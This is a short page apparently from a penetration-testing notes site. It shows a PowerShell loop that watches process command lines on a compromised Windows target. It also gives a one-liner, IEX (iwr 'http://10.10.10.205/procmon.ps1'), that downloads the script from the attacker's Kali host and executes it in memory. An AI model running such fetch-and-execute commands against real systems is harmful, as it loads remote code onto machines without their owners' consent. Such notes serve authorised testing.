Monitor for process command lines

Host script in our machine (kali) and execute on the target machine (windows) procmon.ps1

while($true)
{

  $process = Get-WmiObject Win32_Process | Select-Object CommandLine
  Start-Sleep 1
  $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
  Compare-Object -ReferenceObject $process -DifferenceObject $process2

}

Run script:

IEX (iwr 'http://10.10.10.205/procmon.ps1')

PreviousNetwork traffic capture NextCheck recycle bin

Last updated 1 day ago